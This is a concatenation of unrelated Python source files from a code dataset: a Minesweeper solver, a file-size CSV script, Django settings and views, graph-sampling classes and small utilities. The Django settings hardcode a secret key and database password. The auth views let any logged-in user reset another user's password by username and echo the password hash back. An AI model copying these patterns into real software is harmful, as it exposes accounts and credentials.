except the busted mines and flagged cells\n for (x, y) in (self.cells - self.mines_busted - self.flagged):\n if self.data.get((x, y)).get(\"clue\") != \"ni\": # if the clue for the cell is not ni (not identified)\n # Number of hidden cells around (x, y)\n hidden = 0\n # List of hidden cells around (x, y)\n hiddenlist = set()\n # Number of safe cells around (x, y)\n safe = 0\n # List of safe cells around (x, y)\n safelist = set()\n # Number of mine cells around (x, y)\n mine = 0\n # List of mine cells around (x, y)\n minelist = set()\n\n # Iterating over each neighbor of (x, y) to update the above mentioned list\n for n in self.data.get((x, y)).get(\"neighbour\"):\n if self.data.get(n).get(\"status\") == \"C\": # if the status of the cell is covered\n hidden += 1 # increase number of hidden cells\n hiddenlist.add(n) # add the cell to the hidden list\n elif self.data.get(n).get(\"status\") == \"S\": # if the status of the cell is safe, add to safelist\n safe += 1 # update no of safe cells\n safelist.add(n)\n elif self.data.get(n).get(\"status\") == \"M\": # if the cell is a mine, add to minelist\n mine += 1 # update no of mines detected\n minelist.add(n)\n\n # If total number of remaining mines around cell (x,y) equals to total number of hidden cells around\n # (x, y), then it implies that all hidden cells around x, y are mines.\n if hiddenlist: # if cells exist in hiddenlist\n # if the clue minus current number of mines detected is equal to the current number of hidden cells\n if self.data.get((x, y)).get(\"clue\") - mine == hidden:\n for sn in hiddenlist:\n self.data.get(sn)[\"status\"] = \"M\" # update all those cells as mines\n # Adding identified mines and flagging it\n self.flag(sn)\n # If all mines around x,y have been identified, then all the remaining hidden cells around x, y\n # are safe.\n elif (self.data.get((x, y)).get(\"neighbours\") - self.data.get((x, y)).get(\"clue\")) - safe == hidden:\n for sn in hiddenlist:\n self.data.get(sn)[\"status\"] = \"S\"\n # Adding identified safe cells to the list\n if sn not in self.opened and sn not in self.safe:\n self.safe.append(sn)\n else: # otherwise add cell to the solved list\n self.solved.add((x, y))\n # Based on updated information, calling method to generate hint\n return self.generatehint()\n\n def generatehint(self):\n \"\"\"\n function to generate a hint for the game to proceed, returns the next step for the agent to take\n \"\"\"\n\n # If safe list is not empty, give first element in safe list as a hint\n if self.safe: # if safe\n step = self.safe.pop(0) # remove the first element from the list\n else:\n # get remaining cells excluding the opened and flagged cells\n permittedsteps = self.cells - self.opened - self.flagged # get remaining cells excluding the opened and flagged cells\n step = random.choice(list(permittedsteps)) # from these cells, choose one randomly\n\n return step\n\n def win(self):\n \"\"\"\n Display final score after game is completed. final score is #mines flagged/# mines\n \"\"\"\n # Total number of mines busted by user while playing\n if self.mines_busted:\n print(\"You finished with %s tripped mines. 
Final score %s\" % (\n                len(self.mines_busted), len(self.flagged) / len(self._mines)))\n\n\nclass MineSweeperPlay(MineSweeper1):\n    \"\"\"\n    Play the Minesweeper game!\n    This class automates the Minesweeper gameplay for the above class using the Tkinter library.\n    If the mode is Test, the result is displayed.\n    \"\"\"\n\n    # Constructor\n    def __init__(self, *args, **kw):\n        # Calling MAIN CLASS\n        MineSweeper1.__init__(self, *args, **kw)  # use the __init__ function from the above class to create the board\n\n    def letsplay(self):\n        \"\"\"\n        plays the game; starts timer and runs until all cells are opened and returns the time taken in microseconds\n        \"\"\"\n        start_time = t.datetime.now()  # Noting time taken for the game to complete\n        while self.empty_remaining > 0:  # until all cells are opened\n            step = self.updateinformation()  # update the information for the cell\n            self.open(step)  # and open that cell\n        # return the final results (total_seconds() is used so runs longer than one second are not truncated)\n        return len(self._mines), len(self.flagged), len(self.mines_busted), int((t.datetime.now() - start_time).total_seconds() * 1000000)\n\n    def display(self):\n        \"\"\"\n        displays the GUI for the game, using the Tkinter library\n        \"\"\"\n\n        # Creating window and adding properties to it\n        window = tk.Tk()\n        table = tk.Frame(window)\n        table.pack()\n        squares = {}\n\n        # Build buttons\n        for xy in self.cells:  # for all the cells\n            squares[xy] = button = tk.Button(table, padx=0, pady=0)  # create buttons for all cells\n            row, column = xy\n            # expand button to North, East, West, South\n            button.grid(row=row, column=column, sticky=\"news\")\n\n            # Scaling the size of button based on the size of minesweeper board\n            scale = math.floor(50 // (1 if self.size // 10 == 0 else self.size // 10))\n            table.grid_columnconfigure(column, minsize=scale)\n            table.grid_rowconfigure(row, minsize=scale)\n            # needed to restore bg to default when unflagging\n            self.refresh(xy, squares)\n\n        # Displaying final score\n        window.title(\"You finished with %s tripped mines. Final score %s\" % (\n            len(self.mines_busted), len(self.flagged) / len(self._mines)))\n        window.mainloop()\n\n    def refresh(self, xy, squares):\n        \"\"\"\n        Update the GUI for given square\n        \"\"\"\n        button = squares[xy]\n\n        # Fetching and setting visual data for the cell\n        text, fg, bg = self.getvisualdataforcell(xy)\n        button.config(text=text, fg=fg, bg=bg)\n\n        # Updating information for button if it is opened and setting it with a sunken effect\n        if xy in self.opened:\n            button.config(relief=tk.SUNKEN)\n\n    def getvisualdataforcell(self, xy):\n        \"\"\"\n        Fetching Visual data for cell based on its status\n        \"\"\"\n        # If cell is opened and it is mine, it will be marked as a mine. 
Else, the clue will be displayed.\n if xy in self.opened:\n if xy in self._mines:\n return u'\\N{SKULL AND CROSSBONES}', None, 'red'\n\n mn = self.data.get(xy).get(\"clue\")\n if mn >= 0:\n # Standard minesweeper colors\n fg = {0: 'black', 1: 'blue', 2: 'dark green', 3: 'red',\n 4: 'dark blue', 5: 'dark red',\n }.get(mn, 'black')\n return str(mn), fg, 'white'\n\n # if xy is in flagged\n elif xy in self.flagged:\n # display a white flag\n return u'\\N{WHITE FLAG}', None, 'green'\n # For remaining cells, they will be just green\n elif xy in self._mines:\n self.flagged.add(xy)\n return u'\\N{WHITE FLAG}', None, 'green'\n else:\n # display green cell\n return '', None, 'green'\n\n\ndef disp_data(data, varnames, xlabel, ylabel, title):\n \"\"\"\n This method is used to visualize data by displaying the graph\n :param data: data to be plotted\n :param varnames: variables to be plotted\n :param xlabel: x label\n :param ylabel: y label\n :param title: title\n \"\"\"\n\n # using the matplotlib library to plot the graphs\n fig = plt.figure() # Initializing figure\n ax1 = fig.add_subplot()\n ax1.set_xlabel(xlabel)\n ax1.set_ylabel(ylabel)\n ax1.set_title(title)\n thiningfactors = list(data.keys()) # get the keys from the data dictionary\n\n for var in varnames: # for all the variables to be plotted\n success = list(map(lambda key: round(data.get(key).get(var)), data.keys()))\n ax1.plot(thiningfactors, success, label=var)\n ax1.legend(title=\"Mines\") # create legends for the graphs\n ax1.grid(True) # add grid to the graphs\n\n\ndef main(cls):\n \"\"\"\n Main function to either play the Minesweeper game, or analyze the performance of the player\n \"\"\"\n # This is used to either analyze the basic minesweeper board or test it\n Mode = input(\"Select the mode (Analysis/Test) \")\n # if mode is Analysis\n if \"analysis\".casefold().__eq__(Mode.casefold()):\n # initalize the parameters\n result = {}\n sizes = [30, 40, 50, 60]\n mdenisty = 0.40\n iterations = 5\n print(\"Generating Data\")\n # for the sizes defined above\n for size in sizes:\n # Avg total number of mines\n meanmines = 0\n # Avg total number of flagged mines\n meanflagged = 0\n # Avg total number of busted mines\n meanbusted = 0\n # Avg time taken\n meantimetaken = 0\n # Plays the game \"iterations\" number of times\n for i in range(0, iterations):\n game = cls(size, mdenisty, \"A\")\n # getting the total number of mines, total flagged cells, busted mines and time take once the game is done\n tmines, tflagged, tbusted, timetaken = game.letsplay()\n # Update meanmines, meanflagged, meanbusted, meantimetaken accordingly\n meanmines += tmines\n meanflagged += tflagged\n meanbusted += tbusted\n meantimetaken += round(timetaken / (10 ** 3), 4)\n result[size] = {\"meanmines\": math.floor(meanmines / iterations), \"meanflagged\": math.floor(meanflagged / iterations),\n \"meanbusted\": math.floor(meanbusted / iterations),\n \"meantimetaken\": math.floor(meantimetaken / iterations)}\n print(\"Plotting Data\")\n # displays the graph for the parameters mentioned above\n disp_data(result, [\"meanmines\", \"meanflagged\", \"meanbusted\"], \"Sizes\", \"Numbers\", \"Size vs efficiency\")\n disp_data(result, [\"meantimetaken\"], \"Sizes\", \"Time( MilliSeconds )\", \"Size vs Time taken\")\n plt.show()\n else: # if the mode is Test\n # Ask user for input size\n size = int(input(\"Enter the size \"))\n mdensity = float(input(\"Enter the mine density (0 - 1) \"))\n game = cls(size, mdensity, \"T\")\n # Play the game and display the board\n game.letsplay()\n 
game.display()\n\n\nif __name__ == '__main__':\n # Runs the main function\n main(MineSweeperPlay)\n","sub_path":"Project2/MineSweeper1.py","file_name":"MineSweeper1.py","file_ext":"py","file_size_in_byte":15859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"268467213","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2017-07-18 14:04:11\n# @Author : lzg (wb-lzg228465@autonavi.com)\n# @Link : ${link}\n# @Version : $Id$\n\nimport os\nimport sys\nimport csv\n\n\ndef main():\n value = {}\n value_1 = {}\n allsize = 0.0\n allnu = 0\n strl = \"\"\n # arg = sys.argv\n # print(arg[1])\n arg = {}\n with open('./config.ini', \"r\") as fileobject:\n i = 0\n for line in fileobject:\n i = i + 1\n arg[i] = line\n print(\"检索目录:%s,输出目录:%s;\" % (arg[1][:-1], arg[2]))\n # r'D:\\big_box\\data\\PDB2.3.2\\JP\\LOADABLE'\n for parent, dirnames, filenames in os.walk(arg[1][:-1]):\n for filename in filenames:\n currentpath = os.path.join(parent, filename)\n filesize = os.path.getsize(currentpath)\n temp = 0.0\n temp_1 = 0\n if filename in value:\n temp = value[filename]\n temp_1 = value_1[filename]\n value[filename] = temp + filesize / 1024 / 1024\n value_1[filename] = temp_1 + 1\n # for line in value:\n # print(line[:-4])\n # allsize = allsize + value[line]\n # allnu = allnu + value_1[line]\n # strl = strl + line[:-4] + \" \" + value_1[line] + str(value[line]) + \"\\n\"\n # r'E:\\大客户\\文档\\规则需求\\发布资料\\test.txt'\n with open(arg[2], \"w\", newline=\"\") as fobj:\n # fobj.write(strl)\n writer = csv.writer(fobj)\n writer.writerow([\"序号\", \"模块\", \"数量\", \"大小/Mb\"])\n i = 0\n for line in value:\n allsize = allsize + value[line]\n allnu = allnu + value_1[line]\n i = i + 1\n writer.writerow(\n [str(i), line[:-4], str(value_1[line]), str(value[line])])\n\n writer.writerow([str(i + 1), \"总数\", str(allnu), str(allsize)])\n # with open(arg[2], \"a\") as fobj1:\n # strl = \"allsize\" + \" \" + str(allsize)\n # fobj1.write(strl)\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/20170718-1.py","file_name":"20170718-1.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456048765","text":"# -*- coding: utf-8\n\"\"\"\nDjango settings for jobtrak project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSECRET_KEY = 'wv9o)z07uyra13e4(c9d%6djiyjr$h7&b8y3&6z_+%r4m7+8(u'\n\nDEBUG = True\n\n# TEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\nINSTALLED_APPS = (\n\t'grappelli',\n\t'django.contrib.admin',\n#\t'django.contrib.admin.apps.SimpleAdminConfig',\n\t'django.contrib.admindocs',\n\t'django.contrib.auth',\n\t'django.contrib.contenttypes',\n\t'django.contrib.sessions',\n\t'django.contrib.messages',\n\t'django.contrib.staticfiles',\n\t'django.contrib.humanize',\n\t'django_extensions',\n\t'bootstrap3',\n\t'taggit',\n\t'django_tables2',\n\t'external_urls',\n\t'mmg.jobtrak.util',\n\t'mmg.jobtrak.core',\n\t'mmg.jobtrak.links',\n\t'mmg.jobtrak.contact',\n\t'mmg.jobtrak.cms',\n\t'mmg.jobtrak.public',\n\t'mmg.jobtrak.profile',\n\t'mmg.jobtrak.help',\n)\n\nROOT_URLCONF = 'JobTrak.urls'\n\nWSGI_APPLICATION = 'JobTrak.wsgi.application'\n\nMIDDLEWARE_CLASSES = 
(\n\t'django.contrib.sessions.middleware.SessionMiddleware',\n\t'django.middleware.common.CommonMiddleware',\n\t'django.middleware.csrf.CsrfViewMiddleware',\n\t'django.contrib.auth.middleware.AuthenticationMiddleware',\n\t'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n\t'django.contrib.messages.middleware.MessageMiddleware',\n\t'django.middleware.clickjacking.XFrameOptionsMiddleware',\n\t'django.contrib.admindocs.middleware.XViewMiddleware',\n\t'django.middleware.locale.LocaleMiddleware',\n)\n\nBOOTSTRAP3 = {\n\t'jquery_url': '//code.jquery.com/jquery.min.js',\n\t'base_url': '//netdna.bootstrapcdn.com/bootstrap/3.3.1/',\n\t'css_url': None,\n\t'theme_url': None,\n\t'javascript_url': None,\n\t'javascript_in_head': False,\n\t'include_jquery': False,\n\t'horizontal_label_class': 'col-md-2',\n\t'horizontal_field_class': 'col-md-4',\n\t'set_required': True,\n\t'set_placeholder': True,\n\t'required_css_class': '',\n\t'error_css_class': 'has-error',\n\t'success_css_class': 'has-success',\n\t'formset_renderers':{\n\t\t'default': 'bootstrap3.renderers.FormsetRenderer',\n\t},\n\t'form_renderers': {\n\t\t'default': 'bootstrap3.renderers.FormRenderer',\n\t},\n\t'field_renderers': {\n\t\t'default': 'bootstrap3.renderers.FieldRenderer',\n\t\t'inline': 'bootstrap3.renderers.InlineFieldRenderer',\n\t},\n}\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR,'files','templates'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.i18n',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'postgres',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n 'HOST': 'db',\n 'PORT': 5432,\n }\n}\n\nLANGUAGE_CODE = 'en'\nTIME_ZONE = 'America/New_York'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nUSE_THOUSAND_SEPARATOR = True\n\n# LANGUAGE_COOKIE_NAME = 'jobtrak_l'\n# CSRF_COOKIE_NAME = 'jobtrak_c'\n# SESSION_COOKIE_NAME = 'jobtrak_s'\n\nGRAPPELLI_ADMIN_TITLE = \"JobTrak\"\nGRAPPELLI_AUTOCOMPLETE_LIMIT = 10\nGRAPPELLI_SWITCH_USER = True\n\nugettext = lambda s: s\n\nLANGUAGES = (\n\t('de', u'Deutsch'),\n\t('nl', u'Dutch'),\n\t('en', u'English'),\n\t('es', u'Español'),\n\t('fi', u'Finnish'),\n\t('fr', u'Français'),\n\t('it', u'Italian'),\n\t('sv', u'Swedish'),\n\t('tr', u'Türkçe'),\n)\n\nLOCALE_PATHS = (\n\tos.path.join(BASE_DIR,'files','locale'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','cms'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','contact'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','core'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','help'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','links'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','profile'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','public'),\n\tos.path.join(BASE_DIR,'mmg','jobtrak','util'),\n)\n\n\nSTATICFILES_DIRS = (\n\t('libs',os.path.join(BASE_DIR,'libs')),\n)\n\nSTATICFILES_FINDERS = (\n\t'django.contrib.staticfiles.finders.FileSystemFinder',\n\t'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\nSTATIC_ROOT = os.path.join(BASE_DIR,'files','static')\nSTATIC_URL = '/static/'\n\nMEDIA_ROOT = 
os.path.join(BASE_DIR,'files','media')\nMEDIA_URL = '/media/'\n","sub_path":"web/code/JobTrak/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125794690","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myapp', '0007_delete_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contato',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('titulo', models.CharField(verbose_name='Título da Página', max_length=50)),\n ('descricao', models.TextField(verbose_name='Descrição')),\n ],\n options={\n 'verbose_name_plural': 'contato',\n 'verbose_name': 'contato',\n },\n ),\n ]\n","sub_path":"myproject/myapp/migrations/0008_contato.py","file_name":"0008_contato.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"573932162","text":"\"\"\"Stores the state of a sample.\r\n\"\"\"\r\n\r\nfrom typing import List, Dict, Tuple\r\nfrom copy import copy\r\n\r\nimport numpy as np\r\n\r\nclass SampleState():\r\n \"\"\"Stores the state of a sample.\r\n \"\"\"\r\n def __init__(self, sample_size: int) -> None:\r\n \"\"\"Creates a default, empty sample state.\r\n \"\"\"\r\n self.empty = True\r\n self.sample_size = sample_size\r\n self.sample_idx = np.asarray([], dtype=np.int32)\r\n # End of __init__()\r\n\r\n @staticmethod\r\n def create_sample_state(num_vertices: int, prev_state: 'SampleState', args: 'argparse.Namespace') -> 'SampleState':\r\n \"\"\"Performs sampling according to the sample type in args.\r\n \"\"\"\r\n if args.sample_type == \"uniform_random\":\r\n return UniformRandomSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"random_walk\":\r\n return RandomWalkSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"random_jump\":\r\n return RandomJumpSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"degree_weighted\":\r\n return DegreeWeightedSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"random_node_neighbor\":\r\n return RandomNodeNeighborSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"forest_fire\":\r\n return ForestFireSampleState(num_vertices, prev_state)\r\n elif args.sample_type == \"expansion_snowball\":\r\n return ExpansionSnowballSampleState(num_vertices, prev_state)\r\n else:\r\n raise NotImplementedError(\"Sample type: {} is not implemented!\".format(args.sample_type))\r\n # End of create_sample()\r\n# End of SampleState\r\n\r\nclass UniformRandomSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'UniformRandomSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n if not prev_state.empty:\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of UniformRandomSampleState\r\n\r\nclass RandomWalkSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'RandomWalkSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sampled_marker = 
copy(prev_state.sampled_marker)\r\n self.index_set = copy(prev_state.index_set)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of RandomWalkSampleState\r\n\r\nclass RandomJumpSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'RandomJumpSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.index_set = copy(prev_state.index_set)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of RandomJumpSampleState\r\n\r\nclass DegreeWeightedSampleState(SampleState):\r\n def __init__(self, num_vertices, prev_state: 'DegreeWeightedSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n if not prev_state.empty:\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of DegreeWeightedSampleState\r\n\r\nclass RandomNodeNeighborSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'RandomNodeNeighborSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.index_set = copy(prev_state.index_set)\r\n # End of __init__()\r\n# End of RandomNodeNeighborSampleState\r\n\r\nclass ForestFireSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'ForestFireSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.sampled_marker = [False] * num_vertices\r\n self.burnt_marker = [False] * num_vertices\r\n self.current_fire_front = [np.random.randint(num_vertices)]\r\n self.next_fire_front = list() # type: List[int]\r\n self.index_set = list() # type: List[int]\r\n if not prev_state.empty:\r\n self.sampled_marker = copy(prev_state.sampled_marker)\r\n self.burnt_marker = copy(prev_state.burnt_marker)\r\n self.current_fire_front = copy(prev_state.current_fire_front)\r\n self.next_fire_front = copy(prev_state.next_fire_front)\r\n self.index_set = copy(prev_state.index_set)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of ForestFireSampleState\r\n\r\nclass ExpansionSnowballSampleState(SampleState):\r\n def __init__(self, num_vertices: int, prev_state: 'ExpansionSnowballSampleState') -> None:\r\n SampleState.__init__(self, prev_state.sample_size)\r\n self.empty = False\r\n self.start = np.random.randint(num_vertices)\r\n self.index_flag = [False] * num_vertices\r\n self.index_flag[self.start] = True\r\n self.index_set = [self.start]\r\n self.neighbors = list() # type: List[int]\r\n self.neighbors_flag = [False] * num_vertices\r\n self.contribution = [0] * num_vertices\r\n if not prev_state.empty:\r\n self.start = copy(prev_state.start)\r\n self.index_flag = copy(prev_state.index_flag)\r\n self.index_set = copy(prev_state.index_set)\r\n self.neighbors = copy(prev_state.neighbors)\r\n self.neighbors_flag = copy(prev_state.neighbors_flag)\r\n self.contribution = copy(prev_state.contribution)\r\n self.sample_idx = copy(prev_state.sample_idx)\r\n # End of __init__()\r\n# End of 
ExpansionSnowballSampleState\r\n","sub_path":"StochasticBlockPartition/code/python/samplestate.py","file_name":"samplestate.py","file_ext":"py","file_size_in_byte":6379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"285842255","text":"import sys\nimport venusian\n\n# A fixed version of venusian walk_packages so that we can property\n# ignore things\ndef walk_packages(path=None, prefix='', onerror=None, ignore=None):\n \"\"\"Yields (module_loader, name, ispkg) for all modules recursively\n on path, or, if path is None, all accessible modules.\n\n 'path' should be either None or a list of paths to look for\n modules in.\n\n 'prefix' is a string to output on the front of every module name\n on output.\n\n Note that this function must import all *packages* (NOT all\n modules!) on the given path, in order to access the __path__\n attribute to find submodules.\n\n 'onerror' is a function which gets called with one argument (the name of\n the package which was being imported) if any exception occurs while\n trying to import a package. If no onerror function is supplied, any\n exception is exceptions propagated, terminating the search.\n\n 'ignore' is a function fed a fullly dotted name; if it returns True, the\n object is skipped and not returned in results (and if it's a package it's\n not imported).\n\n Examples:\n\n # list all modules python can access\n walk_packages()\n\n # list all submodules of ctypes\n walk_packages(ctypes.__path__, ctypes.__name__+'.')\n\n # NB: we can't just use pkgutils.walk_packages because we need to ignore\n # things\n \"\"\"\n def seen(p, m={}):\n if p in m: # pragma: no cover\n return True\n m[p] = True\n\n # iter_modules is nonrecursive\n for importer, name, ispkg in venusian.iter_modules(path, prefix):\n\n if ignore is not None and ignore(name):\n # if name is a package, ignoring here will cause\n # all subpackages and submodules to be ignored too\n continue\n\n # do any onerror handling before yielding\n\n if ispkg:\n try:\n __import__(name)\n except Exception:\n if onerror is not None:\n onerror(name)\n else:\n raise\n else:\n yield importer, name, ispkg\n path = getattr(sys.modules[name], '__path__', None) or []\n\n # don't traverse path items we've seen before\n path = [p for p in path if not seen(p)]\n\n for item in walk_packages(path, name+'.', onerror, ignore):\n yield item\n else:\n yield importer, name, ispkg\n","sub_path":"IxiaCR/ixiacr/patches/venusian_patch.py","file_name":"venusian_patch.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64113895","text":"from django.shortcuts import render\nfrom .models import User\nfrom .serializers import RegisterSerializer, LoginSerializer, AccessToken, ChangePasswordSerializer, ChangeProfileSerializer, UserSerializer, UpdateUserSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.contrib.auth import login,logout\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework_simplejwt.token_blacklist.models import BlacklistedToken, OutstandingToken\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\nfrom .permissions import IsSuperUser\n# from django.contrib.auth.\n# Create your views here.\nclass RegisterView(APIView):\n permission_classes=(IsAuthenticated,IsSuperUser,)\n def post(self, request):\n serializer=RegisterSerializer(data=request.data)\n if 
serializer.is_valid():\n            user=serializer.save()\n            response={\n                \"username\": user.username,\n                'status_code':201,\n            }\n            return Response(response, status=201)\n        return Response(serializer.errors, status=200)\n\nclass LoginView(APIView):\n    permission_classes=(AllowAny,)\n    def post(self, request):\n        serializer=LoginSerializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n\n        user=serializer.validated_data['user']\n        login(request, user)\n        access=AccessToken.for_user(user)\n        response={\n            \"id\":user.id,\n            \"username\":user.username,\n            \"superuser\":user.is_superuser,\n            \"admin\":user.is_staff,\n            \"status_code\": 200,\n            \"token\": str(access)\n            \n        }\n\n        return Response(response, status=200)\n\n\nclass LogoutView(APIView):\n    \n    def post(self, request):\n        tokens = OutstandingToken.objects.filter(user_id=request.user.id)\n        for token in tokens:\n            BlacklistedToken.objects.get_or_create(token=token)\n        logout(request)\n        return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass CheckToken(APIView):\n    def get(self, request):\n        access=request.data['access']\n        if AccessToken(access).check_blacklist():\n            return Response({\"token\":\"token is blacklisted\", \"status_code\": 403}, status=403)\n        return Response({\"token\":access, \"status_code\": 200}, status=200)\n\nclass ChangePasswordView(APIView):\n    def put(self, request):\n        password=request.data['password']\n        username=request.data['username']\n        user=User.objects.get(username=username)\n        serializer = ChangePasswordSerializer(data=request.data)\n        if serializer.is_valid():\n            user.set_password(password)\n            user.save()\n            response={\n                'username':user.username,\n                'password':user.password,\n                'status_code':200\n            }\n            return Response(response, status=200)\n        return Response(serializer.errors, status=200)\n\nclass ChangeProfileView(APIView):\n    def get(self, request, username):\n        # username=request.data['username']\n        user=User.objects.get(username=username) \n        serializer=ChangeProfileSerializer(user)\n        if serializer:\n            response={\n                \"data\":serializer.data,\n                \"status_code\": 200\n            }\n            return Response(response, status=200)\n        return Response({\"detail\":\"error\", \"status_code\":400}, status=200)\n    def put(self, request, username):\n        # username=request.data['username']\n        user=User.objects.get(username=username)\n        serializer=ChangeProfileSerializer(user, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            response={\n                \"user\":serializer.data,\n                \"status_code\": 200\n            }\n            return Response(response, status=200)\n        return Response(serializer.errors, status=200)\n\nclass UserView(APIView):\n    permission_classes=(IsSuperUser,)\n    def get(self, request):\n        user=User.objects.all()\n        serializer = UserSerializer(user, many=True)\n        response={\n            'data':serializer.data,\n            'status_code':status.HTTP_200_OK\n        }\n        return Response(response, status=status.HTTP_200_OK)\n\nclass UpdateUserView(APIView):\n    permission_classes=(IsSuperUser,)\n    def get(self, request, username):\n        # username=request.data['username']\n        user=User.objects.get(username=username) \n        serializer=UpdateUserSerializer(user)\n        if serializer:\n            response={\n                \"data\":serializer.data,\n                \"status_code\": 200\n            }\n            return Response(response, status=200)\n        return Response({\"detail\":\"error\", \"status_code\":400}, status=200)\n\n    def put(self, request, username):\n        # username=request.data['username']\n        user=User.objects.get(username=username)\n        serializer=UpdateUserSerializer(user, data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            response={\n                \"data\":serializer.data,\n            
\"status_code\": 200\n }\n return Response(response, status=200)\n return Response(serializer.errors, status=400)","sub_path":"authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"340837531","text":"#!/usr/bin/env python3\nimport numpy as np \n# import matplotlib.pyplot as plt\n# data = np.random.normal(size = (5,100000))*100\n# fig,ax = plt.subplots()\n# ax.hist(data[0], 40, normed = 1, histtype = 'bar', facecolor = 'yellowgreen', alpha = 0.5)\n# ax.set_title('pdf')\n# plt.show()\ntemperature_file = '/home/hadoop/homework/Parallel-Computing/project4/data/Temperature.txt'\ncity_number = 5\ntime_step = 10000000\nfo = open(temperature_file, \"w\")\n \nfor city in range(city_number):\n for _ in range(time_step):\n fo.write(\"%d\\t %.5f\\n\"%(city, np.random.normal(1)*100))\n\nfo.close()\n","sub_path":"Parallel-Computing/project4/src/data_generater.py","file_name":"data_generater.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"602609430","text":"from turbodbc import connect\nimport datetime\nimport ttp\n\nclass DBConnect:\n orderstart = ''\n orderend = ''\n orderstotal = ''\n datestart = ''\n datemin = ''\n datemax = ''\n db = {}\n fields = {}\n fix = {}\n 